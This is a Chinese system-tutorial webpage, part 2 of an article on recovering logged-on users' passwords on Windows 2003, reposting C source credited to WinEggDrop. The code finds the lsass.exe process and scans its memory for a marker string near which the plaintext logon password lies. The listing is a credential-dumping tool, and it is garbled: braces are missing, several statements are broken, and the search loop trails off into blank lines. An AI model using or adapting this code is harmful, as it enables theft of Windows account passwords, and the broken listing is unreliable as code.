系統(tǒng)之家 - 系統(tǒng)光盤下載網(wǎng)站!

當(dāng)前位置:系統(tǒng)之家 > 系統(tǒng)教程 > 在win 2003中得到登陸用戶的密碼的三大妙法(2)

在win 2003中得到登陸用戶的密碼的三大妙法(2)

時(shí)間:2012-10-29 14:30:41 作者:木木 來(lái)源:系統(tǒng)之家 1. 掃描二維碼隨時(shí)看資訊 2. 請(qǐng)使用手機(jī)瀏覽器訪問(wèn): https://m.xitongzhijia.net/xtjc/20121029/17921.html 手機(jī)查看 評(píng)論

  代碼: //********************************************************************************

  // Version: V1.0

  // Coder: WinEggDrop

  // Date Release: 12/15/2004

  // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method

  // Used Is Pretty Unwise,But This May Be The Only Way To Review The

  // Logon User's Password On windows 2003.

  // Test PlatForm: windows 2003

  // Compiled On: VC++ 6.0





  #define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

  char Password[MAX_PATH] = ; // Store The Found Password

  // Function ProtoType Declaration


  BOOL FindPassword(DWORD PID);

  int Search(char *Buffer,const UINT nSize);

  DWORD GetLsassPID();

  BOOL Is2003();


  // End Of Fucntion ProtoType Declaration

  int main()


  DWORD PID = 0;

  printf("windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

  if (!Is2003()) // Check Out If The Box Is 2003


  printf("The Program Can't Only Run On windows 2003 Platform\n");

  return -1;


  PID = GetLsassPID(); // Get The Lsass.exe PID

  if (PID == 0) // Fail To Get PID If Returning Zerom


  return -1;


  FindPassword(PID); // Find The Password From Lsass.exe Memory

  return 0;


  // End main()


  // Purpose: Search The Memory & Try To Get The Password

  // Return Type: int

  // Parameters:

  // In: char *Buffer --> The Memory Buffer To Search

  // Out: const UINT nSize --> The Size Of The Memory Buffer

  // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",

  // Since The Password Is Near The Above Location,But It's Not Always True That

  // We Will Find The Magic String,Or Even We Find It,The Password May Be Located

  // At Some Other Place.We Only Look For Luck


  int Search(char *Buffer,const UINT nSize)


  UINT OffSet = 0;

  UINT i = 0;

  UINT j = 0 ;

  UINT Count = 0;

  if (Buffer == NULL)


  return -1;


  for (i = 0 ; i < nSize ; i++)


  /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word

  Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate

  The Magic String,We Have To Do It Manually And Slowly


  if (Buffer == 'L')


  OffSet = 0;

  if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)


  OffSet += strlen("LocalSystem") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)


  OffSet += strlen("Remote") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)


  OffSet += strlen("Procedure") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)


  i += OffSet;








  if (i < nSize)



  for (; i < nSize ; i++)












掃碼關(guān)注 官方交流群 軟件收錄